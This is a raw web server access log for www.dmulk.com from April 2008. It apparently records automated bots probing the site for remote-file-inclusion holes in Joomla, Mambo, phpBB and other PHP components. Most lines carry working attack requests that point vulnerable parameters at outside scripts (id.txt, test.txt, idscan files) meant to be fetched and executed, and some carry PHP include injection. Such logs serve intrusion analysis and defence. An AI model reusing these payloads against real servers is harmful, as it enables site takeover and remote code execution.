195.205.178.120 - - [08/Apr/2008:11:55:52 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:11:55:53 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:11:55:54 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:11:55:55 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:11:55:59 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:55:59 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:55:59 -0700] "GET //config/dbutil.bck.php?confdir=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:55:59 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:11:55:59 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:11:55:59 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:11:56:00 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.14.220.115 - - [08/Apr/2008:11:56:16 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://kerjain.net/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.220.115 - - [08/Apr/2008:11:56:16 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://kerjain.net/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.220.115 - - [08/Apr/2008:11:56:18 -0700] "GET /logs/access_080329.log/index.php?option=com_custompages&cpage=http://kerjain.net/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.182 - - [08/Apr/2008:11:56:20 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
203.146.251.182 - - [08/Apr/2008:11:56:20 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:56:28 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:56:28 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:56:31 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:56:32 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:11:56:47 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:11:56:48 -0700] "GET /index.php?redir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:11:56:48 -0700] "GET /logs/index.php?redir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.48.5.211 - - [08/Apr/2008:11:57:12 -0700] "GET /logs/access_080218.loghttp://myluckypotparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:11:57:30 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:11:57:30 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:11:57:34 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:57:39 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:11:57:40 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:11:57:40 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:11:57:41 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:57:41 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:57:41 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:11:57:41 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:11:57:41 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:57:43 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:11:57:47 -0700] "GET //atom.php5?page=http://www.priproqua.altervista.org/php5/com.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.206.50 - - [08/Apr/2008:11:57:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:11:57:55 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:11:57:55 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:11:57:55 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:11:57:56 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:11:57:56 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:11:58:09 -0700] "GET //atom.php5?page=http://www.priproqua.altervista.org/php5/com.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:58:10 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:58:10 -0700] "GET //config/dbutil.bck.php?confdir=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:58:10 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:11:58:11 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:11:58:13 -0700] "GET /index.php?redir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:11:58:14 -0700] "GET /logs/index.php?redir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:11:58:16 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:11:58:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:11:58:18 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:11:58:18 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:11:58:19 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:11:58:20 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:11:58:21 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:11:58:30 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:11:58:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:11:58:30 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
117.199.192.3 - - [08/Apr/2008:11:58:32 -0700] "GET /logs/access.loghttp://myluckypotparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:11:58:39 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:11:58:44 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:11:58:46 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:58:50 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:58:51 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:11:58:57 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:59:33 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:59:35 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:59:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:59:35 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:59:35 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:59:36 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.37 - - [08/Apr/2008:11:59:37 -0700] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:59:37 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:59:38 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:59:41 -0700] "GET /logs/access.log/index.php?incl=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:59:44 -0700] "GET /index.php?incl=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:59:44 -0700] "GET /logs/index.php?incl=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:12:00:02 -0700] "GET /logs/access.log/avatar.php?page=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:12:00:02 -0700] "GET /avatar.php?page=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:12:00:02 -0700] "GET /logs/avatar.php?page=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:18 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:19 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:20 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:27 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:12:00:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:12:00:31 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:12:00:34 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:12:00:36 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:00:48 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:00:48 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:54 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:54 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:55 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:55 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:55 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:00:55 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:12:01:09 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:01:09 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:01:09 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:12:01:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:01:16 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:01:19 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:01:19 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
